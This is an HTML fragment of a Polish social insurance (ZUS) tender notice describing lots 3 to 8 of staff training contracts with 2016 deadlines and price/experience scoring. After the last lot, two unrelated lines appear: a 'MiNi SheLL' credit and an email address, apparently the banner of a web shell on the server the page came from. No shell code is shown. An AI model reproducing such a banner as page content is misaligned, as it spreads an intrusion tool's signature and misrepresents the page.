<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie i przeprowadzenie szkoleń w temacie: Doskonalenie umiejętności komunikacji z klientem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - temat szkolenia: Doskonalenie umiejętności komunikacji z klientem;
- przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie szkolenia dla pracowników II Oddziału ZUS w Poznaniu - dla pracowników Sali Obsługi Klienta.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/III do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie zawodowe trenerów - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie i przeprowadzenie szkoleń w temacie: Skuteczne rozmowy menedżera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - temat szkolenia: Skuteczne rozmowy menedżera;
- przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie szkoleń dla pracowników II Oddziału ZUS w Poznaniu - dla kadry kierowniczej;
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/IV do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie zawodowe trenerów - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prazygotowanie i przeprowadzenie szkoleń w temacie: Poprawne formy komunikacji z klientem wewnętrznym i zewnętrznym (poprawna i skuteczna polszczyzna w komunikacji urzędowej).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - temat szkolenia: Poprawne formy komunikacji z klientem wewnętrznym i zewnętrznym (poprawna i skuteczna polszczyzna w komunikacji urzędowej);
- przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie szkolenia dla pracowników II Oddziału ZUS w Poznaniu.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/V do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie zaowodowe trenerów - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przygotowanie i przeprowadzenie szkoleń w temacie: Zarządzanie projektami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - temat szkolenia: Zarządzanie projektami;
- przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie szkolenia dla pracowników II Oddziału ZUS w Poznaniu.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/VI do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie zawodowe trenerów - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkoleń w temacie: Radzenie sobie ze stresem w pracy z klientem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - temat szkolenia: Radzenie sobie ze stresem w pracy z klientem;
- przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie dwudniowych szkoleń, których uczestnikami będą pracownicy Zakładu Ubezpieczeń Społecznych Oddział w Ostrowie Wielkopolskim.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/VII do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.05.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie zawodowe trenerów - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkoleń w temacie: Sposoby minimalizowania stresu w pracy zespołowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - temat szkolenia: Sposoby minimalizowania stresu w pracy zespołowej;
- przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie dwudniowych szkoleń, których uczestnikami będą pracownicy Zakładu Ubezpieczeń Społecznych Oddział w Ostrowie Wielkopolskim.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/VIII do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie zawodowe trenerów - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com